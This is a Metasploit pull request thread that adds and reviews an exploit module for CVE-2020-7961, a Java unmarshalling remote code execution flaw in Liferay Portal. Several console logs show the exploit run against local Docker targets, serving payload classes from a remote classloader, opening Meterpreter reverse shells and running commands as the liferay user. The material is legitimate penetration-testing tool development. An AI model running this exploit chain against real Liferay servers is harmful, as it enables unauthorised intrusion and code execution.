[WIP] Add Liferay Portal Java Unmarshalling RCE
rapid7/metasploit-framework pull request #13213
Opened 2020-04-08 12:11 UTC by wvu-r7

# WIP

You can read the writeup this module is based on: https://www.synacktiv.com/posts/pentest/how-to-exploit-liferay-cve-2020-7961-quick-journey-to-poc.html.

## To-do

- [ ] Iron out `check`
- [ ] Create remote classloading library?
- [ ] Create marshalsec library?

## Example

```
msf5 exploit(multi/http/liferay_java_unmarshalling) > run

[*] Started reverse TCP handler on 192.168.1.3:4444
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable. Liferay 7.2.0 CE GA1 MAY be a vulnerable version. Please verify.
[*] Using URL: http://0.0.0.0:8888/
[*] Local IP: http://192.168.1.3:8888/
[*] Sending go-go-gadget for remote classloading
[*] GET /Uphxohekruuokpedknflsriuafhrdsfk.class requested
[+] Sending exploit class
[*] GET /metasploit/Payload.class requested
[+] Sending payload class
[*] HEAD /metasploit.dat requested
[+] Sending 200
[*] GET /metasploit.dat requested
[+] Sending payload config
[*] HEAD /metasploit/Payload.class requested
[+] Sending 200
[*] GET /metasploit/Payload.class requested
[+] Sending payload class
[*] Sending stage (53928 bytes) to 192.168.1.3
[*] Meterpreter session 1 opened (192.168.1.3:4444 -> 192.168.1.3:58271) at 2020-04-08 07:05:47 -0500
[*] Server stopped.

meterpreter > getuid
Server username: liferay
meterpreter > sysinfo
Computer    : 588a96d744cb
OS          : Linux 4.19.76-linuxkit (amd64)
Meterpreter : java/linux
meterpreter >
```

#13195

2020-04-14 21:07 UTC, gwillcox-r7 commented
Talked to @wvu-r7 and confirmed the Docker image does need more memory (about 4-6 GB) to test it out. Last update should update the documentation to reflect this.

2020-04-14 21:08 UTC, gwillcox-r7 commented
@wvu-r7 Tested out the exploit, appears to be working with the installation steps in your documentation. Had some issues initially due to lack of memory on my Docker install which meant it wasn't grabbing an IP and kept crashing, but afterwards the shell comes in very quickly when one tries to exploit this bug :)

```
msf5 > use exploit/multi/http/liferay_java_unmarshalling 
msf5 exploit(multi/http/liferay_java_unmarshalling) > show missing

Module options (exploit/multi/http/liferay_java_unmarshalling):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'


Payload options (java/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)

msf5 exploit(multi/http/liferay_java_unmarshalling) > set RHOSTS 127.0.0.1
RHOSTS => 127.0.0.1
msf5 exploit(multi/http/liferay_java_unmarshalling) > set LHOST 192.168.1.124
LHOST => 192.168.1.124
msf5 exploit(multi/http/liferay_java_unmarshalling) > set SRVPORT 8888
SRVPORT => 8888
msf5 exploit(multi/http/liferay_java_unmarshalling) > exploit 

[*] Started reverse TCP handler on 192.168.1.124:4444 
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable. Liferay 7.2.0 CE GA1 MAY be a vulnerable version. Please verify.
[*] Using URL: http://0.0.0.0:8888/
[*] Local IP: http://192.168.1.124:8888/
[+] Started remote classloader server at http://192.168.1.124:8888/
[*] Unmarshalling remote classloader at http://127.0.0.1:8080/api/jsonws/expandocolumn/update-column
[*] Sending stage (53928 bytes) to 192.168.1.124
[*] Meterpreter session 1 opened (192.168.1.124:4444 -> 192.168.1.124:54019) at 2020-04-14 16:03:42 -0500
[*] Server stopped.

meterpreter > getuid
Server username: liferay
meterpreter > shell
Process 1 created.
Channel 1 created.
whoami
liferay
id
uid=1000(liferay) gid=1000(liferay)
pwd
/opt/liferay
ls
data
deploy
license
logs
osgi
readme.html
tomcat
tomcat-9.0.17
tools
work
```

2020-04-14 22:01 UTC, gwillcox-r7 requested changes
@wvu-r7 Looks good overall, but the documentation/comments are lacking in a few places. Fix those up and it should be good to land 👍

2020-04-14 22:01 UTC, gwillcox-r7 commented on modules/exploits/multi/http/liferay_java_unmarshalling.rb
> +  def packed_classloader_uri
Any chance you could add a comment here explaining the purpose of this function?

2020-04-14 23:44 UTC, wvu-r7 commented on documentation/modules/exploit/multi/http/liferay_java_unmarshalling.md
> +Run `docker run -it -p 8080:8080 liferay/portal:7.2.0-ga1` (note the
I can do that, but it's platform-specific and even distro-specific, so I'll be linking to Docker's instructions. Docker will always pull what it can't find, too.

2020-04-14 23:45 UTC, wvu-r7 commented on documentation/modules/exploit/multi/http/liferay_java_unmarshalling.md
> +classloading server to.
Ah, you're one of those no-prepositions-at-the-end-of-a-sentence people. :)

I'll reword it regardless, since there are "too" many "to"s. :-)

2020-04-14 23:53 UTC, wvu-r7 commented on documentation/modules/exploit/multi/http/liferay_java_unmarshalling.md
> +msf5 exploit(multi/http/liferay_java_unmarshalling) > show missing
Yeah, I've been thinking the same, actually. I was gonna change all my module docs to use `options` or `show options`. It presents a fuller picture.

As for `AutoCheck`, I don't think it's worthwhile checking the value of the option in _this_ example. If you want to automatically show the value, you'll want to change that in the library. That should be a separate PR.

You can check the value right now with `set AutoCheck` or `advanced` (`show advanced`).

2020-04-14 23:59 UTC, wvu-r7 commented on modules/exploits/multi/http/liferay_java_unmarshalling.rb
> +=begin https://github.com/liferay/liferay-portal/blob/master/portal-kernel/src/com/liferay/portal/kernel/util/ReleaseInfo.java
This comment was for myself. But sure. Don't want to confuse myself six months later. :-)

2020-04-15 00:00 UTC, wvu-r7 commented on modules/exploits/multi/http/liferay_java_unmarshalling.rb
> +    # NOTE: Automatic check is implemented by the AutoCheck mixin
I added it to the first module using `AutoCheck`, and I've copy-pasted it ever since!

2020-04-15 00:01 UTC, wvu-r7 commented on modules/exploits/multi/http/liferay_java_unmarshalling.rb
> +    # https://github.com/liferay/liferay-portal/blob/master/portal-impl/src/com/liferay/portlet/expando/service/impl/ExpandoColumnServiceImpl.java
> This comment was for myself. But sure. Don't want to confuse myself six months later, much less a reader. :-)

2020-04-15 00:01 UTC, wvu-r7 commented on modules/exploits/multi/http/liferay_java_unmarshalling.rb
> +    # https://github.com/mbechler/marshalsec/blob/master/src/main/java/marshalsec/gadgets/C3P0WrapperConnPool.java
> This comment was for myself. But sure. Don't want to confuse myself six months later, much less a reader. :-)

2020-04-15 00:01 UTC, wvu-r7 commented on modules/exploits/multi/http/liferay_java_unmarshalling.rb
> +  # java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.Jackson -a
> This comment was for myself. But sure. Don't want to confuse myself six months later, much less a reader. :-)

2020-04-15 00:04 UTC, wvu-r7 commented on modules/exploits/multi/http/liferay_java_unmarshalling.rb
> +  def packed_classloader_uri
It's commented directly above where it's used, but I'll add a specific comment for this _method_. :-)

2020-04-15 01:16 UTC, gwillcox-r7 commented on documentation/modules/exploit/multi/http/liferay_java_unmarshalling.md
> +msf5 exploit(multi/http/liferay_java_unmarshalling) > show missing
Nah didn't want to show it automatically, just wanted to see if `show options` would show its current value. Idk was more a thought of "hey if you can, show me the current value of this option so I can see what your talking about". That being said I agree that in most cases this value is useful and we should assume its set, but in interest of covering all use cases its good to show it.

Agree that `the AutoCheck option` makes a lot more sense. If you want you can just change this output to `show options` output and then make that `the AutoCheck option` change you mentioned.

2020-04-15 01:20 UTC, gwillcox-r7 commented on documentation/modules/exploit/multi/http/liferay_java_unmarshalling.md
> +Run `docker run -it -p 8080:8080 liferay/portal:7.2.0-ga1` (note the
Was thinking more a short one line instructon, just mentioning that you have to install Docker first from docker's website and a note that installation depends on distro, see website for more details. Just avoids people doing the obvious "well I tried but where is this 'docker' thing you mention here?" question in an issue submission or similar. Silly I know, but this is more of a "cover all bases" approach I'm taking here. 

With that being said I'd say this change is much less of a priority than the other issues mentioned below, so if you think this is too much extra let me know.

2020-04-15 01:21 UTC, gwillcox-r7 commented on modules/exploits/multi/http/liferay_java_unmarshalling.rb
> +  def packed_classloader_uri
Method, function, all the same :grin:

2020-04-15 01:26 UTC, wvu-r7 commented on documentation/modules/exploit/multi/http/liferay_java_unmarshalling.md
> +Run `docker run -it -p 8080:8080 liferay/portal:7.2.0-ga1` (note the
I'll do it! Thank you. What are computers, anyway?

2020-04-15 01:27 UTC, wvu-r7 commented on documentation/modules/exploit/multi/http/liferay_java_unmarshalling.md
> +msf5 exploit(multi/http/liferay_java_unmarshalling) > show missing
Unfortunately, it's an advanced option, so it wouldn't show up there. That's a MUCH bigger list.

2020-04-15 01:31 UTC, wvu-r7 commented on documentation/modules/exploit/multi/http/liferay_java_unmarshalling.md
> +msf5 exploit(multi/http/liferay_java_unmarshalling) > show missing
I think I have a worthy compromise. We can document the `AutoCheck` option in every module doc that uses it.

2020-04-15 01:32 UTC, wvu-r7 commented on documentation/modules/exploit/multi/http/liferay_java_unmarshalling.md
> +msf5 exploit(multi/http/liferay_java_unmarshalling) > show missing
RIP `ForceExploit`, long live `ForceExploit`.

2020-04-15 01:50 UTC, h00die commented on documentation/modules/exploit/multi/http/liferay_java_unmarshalling.md
> +classloading server to.
This is a great example of a standard option having some extra useful tidbits. Normally I'd say get rid of it, but it's great!

2020-04-15 01:53 UTC, h00die commented on documentation/modules/exploit/multi/http/liferay_java_unmarshalling.md
> +msf5 exploit(multi/http/liferay_java_unmarshalling) > show missing
In the past I've favored not putting a `show options` since it's 10+ lines of default values (which are captured in the options header) or standard items such as `rhost`. However when something non-standard is set, definitely show that!

2020-04-15 02:25 UTC, wvu-r7 commented on documentation/modules/exploit/multi/http/liferay_java_unmarshalling.md
> +Run `docker run -it -p 8080:8080 liferay/portal:7.2.0-ga1` (note the
Note added.

2020-04-15 02:29 UTC, wvu-r7 commented on documentation/modules/exploit/multi/http/liferay_java_unmarshalling.md
> +classloading server to.
Updated.

2020-04-15 02:30 UTC, wvu-r7 commented on documentation/modules/exploit/multi/http/liferay_java_unmarshalling.md
> +msf5 exploit(multi/http/liferay_java_unmarshalling) > show missing
Try it with `show advanced`.

2020-04-15 02:31 UTC, wvu-r7 commented on documentation/modules/exploit/multi/http/liferay_java_unmarshalling.md
> +msf5 exploit(multi/http/liferay_java_unmarshalling) > show missing
FYI, if I update the `AutoCheck` mixin in this PR, it'll conflict with the [other PR](#13195). Don't put multiple logically separate changes in a PR, kids.

2020-04-15 02:36 UTC, gwillcox-r7 commented on documentation/modules/exploit/multi/http/liferay_java_unmarshalling.md
> +msf5 exploit(multi/http/liferay_java_unmarshalling) > show missing
Maybe a good compromise would be to add ***cut for brevity*** sections in your listing of `show advanced` and then you can focus just on the parts that matter? Just a thought though.

2020-04-15 02:42 UTC, wvu-r7 commented on documentation/modules/exploit/multi/http/liferay_java_unmarshalling.md
> +msf5 exploit(multi/http/liferay_java_unmarshalling) > show missing
I prefer `[snip]` for brevity. :P

2020-04-15 02:43 UTC, wvu-r7 commented on modules/exploits/multi/http/liferay_java_unmarshalling.rb
> +=begin https://github.com/liferay/liferay-portal/blob/master/portal-kernel/src/com/liferay/portal/kernel/util/ReleaseInfo.java
Updated.

2020-04-15 02:55 UTC, wvu-r7 commented on modules/exploits/multi/http/liferay_java_unmarshalling.rb
> +    # https://github.com/liferay/liferay-portal/blob/master/portal-impl/src/com/liferay/portlet/expando/service/impl/ExpandoColumnServiceImpl.java
Updated. Moved stuff, so please retest.

2020-04-15 03:04 UTC, wvu-r7 commented on modules/exploits/multi/http/liferay_java_unmarshalling.rb
> +    # https://github.com/mbechler/marshalsec/blob/master/src/main/java/marshalsec/gadgets/C3P0WrapperConnPool.java
Updated.

2020-04-15 03:07 UTC, wvu-r7 commented on modules/exploits/multi/http/liferay_java_unmarshalling.rb
> +  def packed_classloader_uri
Updated.

2020-04-15 03:08 UTC, wvu-r7 commented on modules/exploits/multi/http/liferay_java_unmarshalling.rb
> +  # java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.Jackson -a
Updated.

2020-04-15 03:11 UTC, wvu-r7 commented on modules/exploits/multi/http/liferay_java_unmarshalling.rb
> +    # https://github.com/liferay/liferay-portal/blob/master/portal-impl/src/com/liferay/portlet/expando/service/impl/ExpandoColumnServiceImpl.java
Retested on my end:

```
msf5 exploit(multi/http/liferay_java_unmarshalling) > run
msf5 exploit(multi/http/liferay_java_unmarshalling) > run

[*] Started reverse TCP handler on 192.168.1.3:4444
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable. Liferay 7.2.0 CE GA1 MAY be a vulnerable version. Please verify.
[*] Using URL: http://0.0.0.0:8888/
[*] Local IP: http://192.168.1.3:8888/
[+] Started remote classloader server at http://192.168.1.3:8888/
[*] Unmarshalling remote classloader at http://127.0.0.1:8080/api/jsonws/expandocolumn/update-column
[*] GET /Rypimvba.class requested
[+] Sending constructor class
[*] GET /metasploit/Payload.class requested
[+] Sending payload class
[*] HEAD /metasploit.dat requested
[+] Sending 200
[*] GET /metasploit.dat requested
[+] Sending payload config
[*] HEAD /metasploit/Payload.class requested
[+] Sending 200
[*] GET /metasploit/Payload.class requested
[+] Sending payload class
[*] Sending stage (53928 bytes) to 192.168.1.3
[*] Meterpreter session 1 opened (192.168.1.3:4444 -> 192.168.1.3:55621) at 2020-04-14 22:11:31 -0500
[*] Server stopped.

meterpreter >
```

2020-04-15 03:14 UTC, wvu-r7 commented on documentation/modules/exploit/multi/http/liferay_java_unmarshalling.md
> +msf5 exploit(multi/http/liferay_java_unmarshalling) > show missing
You know that once I change this here, I'm gonna change it for every single one of my module docs, and you'll have to deal with it. :P <3

2020-04-15 03:15 UTC, wvu-r7 commented on documentation/modules/exploit/multi/http/liferay_java_unmarshalling.md
> +msf5 exploit(multi/http/liferay_java_unmarshalling) > show missing
I think the reason I switched to `show missing` for the example is that whenever `show options` changes, _no one_ updates all the module docs for it. :/

2020-04-15 03:17 UTC, wvu-r7 commented on documentation/modules/exploit/multi/http/liferay_java_unmarshalling.md
> +msf5 exploit(multi/http/liferay_java_unmarshalling) > show missing
Note that my `SRVPORT` change isn't shown in `show missing`, though. This is the primary reason I wanted to change my examples. I want to show all the options I'm changing.

2020-04-15 03:22 UTC, wvu-r7 commented on documentation/modules/exploit/multi/http/liferay_java_unmarshalling.md
> +msf5 exploit(multi/http/liferay_java_unmarshalling) > show missing
`show options` will also show the exploit target, which is really nice.

2020-04-15 03:24 UTC, gwillcox-r7 commented on documentation/modules/exploit/multi/http/liferay_java_unmarshalling.md
> +msf5 exploit(multi/http/liferay_java_unmarshalling) > show missing
Sounds good to me, and using `[snip]` is fine :)

2020-04-15 03:24 UTC, wvu-r7 commented on documentation/modules/exploit/multi/http/liferay_java_unmarshalling.md
> +msf5 exploit(multi/http/liferay_java_unmarshalling) > show missing
Updated to use `options`. I consider this resolved until a follow-up PR.

2020-04-15 03:25 UTC, gwillcox-r7 commented on modules/exploits/multi/http/liferay_java_unmarshalling.rb
> +    # https://github.com/liferay/liferay-portal/blob/master/portal-impl/src/com/liferay/portlet/expando/service/impl/ExpandoColumnServiceImpl.java
@wvu-r7 Will retest now

2020-04-15 03:32 UTC, wvu-r7 commented
Okay, I think the most important review comments have been addressed. I think any updates to the evolving `AutoCheck` mixin will do well in another PR.

Thank you to @gwillcox-r7 for the astute review! It's been a long time. :-)

2020-04-15 03:34 UTC, gwillcox-r7 commented on modules/exploits/multi/http/liferay_java_unmarshalling.rb
> +    # https://github.com/liferay/liferay-portal/blob/master/portal-impl/src/com/liferay/portlet/expando/service/impl/ExpandoColumnServiceImpl.java
Seems to be working fine:

```
msf5 > use exploit/multi/http/liferay_java_unmarshalling 
msf5 exploit(multi/http/liferay_java_unmarshalling) > show options

Module options (exploit/multi/http/liferay_java_unmarshalling):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      8080             yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       Base path
   VHOST                       no        HTTP server virtual host


Payload options (java/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Liferay Portal < 6.2.5 GA6, 7.0.6 GA7, 7.1.3 GA4, 7.2.1 GA2


msf5 exploit(multi/http/liferay_java_unmarshalling) > set RHOSTS 127.0.0.1
RHOSTS => 127.0.0.1
msf5 exploit(multi/http/liferay_java_unmarshalling) > set LHOSTS 192.168.1.124
LHOSTS => 192.168.1.124
msf5 exploit(multi/http/liferay_java_unmarshalling) > set SRVPORT 8888
SRVPORT => 8888
msf5 exploit(multi/http/liferay_java_unmarshalling) > exploit

[-] Exploit failed: The following options failed to validate: LHOST.
[*] Exploit completed, but no session was created.
msf5 exploit(multi/http/liferay_java_unmarshalling) > set LHOST 192.168.1.124
LHOST => 192.168.1.124
msf5 exploit(multi/http/liferay_java_unmarshalling) > exploit

[*] Started reverse TCP handler on 192.168.1.124:4444 
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable. Liferay 7.2.0 CE GA1 MAY be a vulnerable version. Please verify.
[*] Using URL: http://0.0.0.0:8888/
[*] Local IP: http://192.168.1.124:8888/
[+] Started remote classloader server at http://192.168.1.124:8888/
[*] Unmarshalling remote classloader at http://127.0.0.1:8080/api/jsonws/expandocolumn/update-column
[*] Sending stage (53928 bytes) to 192.168.1.124
[*] Meterpreter session 1 opened (192.168.1.124:4444 -> 192.168.1.124:59309) at 2020-04-14 22:32:58 -0500
[*] Server stopped.

meterpreter > getuid
Server username: liferay
meterpreter > shell
Process 1 created.
Channel 1 created.
id
uid=1000(liferay) gid=1000(liferay)
```

2020-04-15 03:50 UTC, gwillcox-r7 requested changes
Two comments still need further fixes, rest looks good! 👍

2020-04-15 03:50 UTC, gwillcox-r7 commented on documentation/modules/exploit/multi/http/liferay_java_unmarshalling.md
> +Run `docker run -it -p 8080:8080 liferay/portal:7.2.0-ga1` (note the
Verified fixed.

2020-04-15 03:50 UTC, gwillcox-r7 commented on documentation/modules/exploit/multi/http/liferay_java_unmarshalling.md
> +after installing [Homebrew](https://brew.sh/).
Excellent explanation, well done!

2020-04-15 03:50 UTC, gwillcox-r7 commented on modules/exploits/multi/http/liferay_java_unmarshalling.rb
> +  def packed_classloader_uri
Verified fixed.

2020-04-15 03:50 UTC, gwillcox-r7 commented on modules/exploits/multi/http/liferay_java_unmarshalling.rb
> +    # https://github.com/mbechler/marshalsec/blob/master/src/main/java/marshalsec/gadgets/C3P0WrapperConnPool.java
I would just say "Implementation of" rather than "Implementation for", but otherwise this is much much better than before :)

2020-04-15 03:50 UTC, gwillcox-r7 commented on modules/exploits/multi/http/liferay_java_unmarshalling.rb
> +  # java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.Jackson -a
Approved, looks good!

2020-04-15 03:50 UTC, gwillcox-r7 commented on modules/exploits/multi/http/liferay_java_unmarshalling.rb
> +    # https://github.com/liferay/liferay-portal/blob/master/portal-impl/src/com/liferay/portlet/expando/service/impl/ExpandoColumnServiceImpl.java
Hmm I don't like this comment as it doesn't explain why your using rand() or send_request_gadget(). Need a bit more explanation around that.

2020-04-15 04:07 UTC, wvu-r7 commented
Yeah, I don't like those either. Fixed, mate. Thanks. :)

I improved the print. I didn't like it before, but I think it's right now.

2020-04-15 04:13 UTC, gwillcox-r7 commented
New changes look good @wvu-r7, this should be good to land :)

2020-04-15 04:24 UTC, gwillcox-r7 approved these changes

2020-04-15 04:38 UTC, merged

2020-04-15 04:42 UTC, gwillcox-r7 commented
# Release Notes

This PR lands an exploit for CVE-2020-7961, a unmarshalling RCE in LifeRay Portal versions prior to 6.2.5 GA6, 7.0.6 GA7, 7.1.3 GA4, and 7.2.1 GA2. Successful exploitation results in remote code execution as the `liferay` user.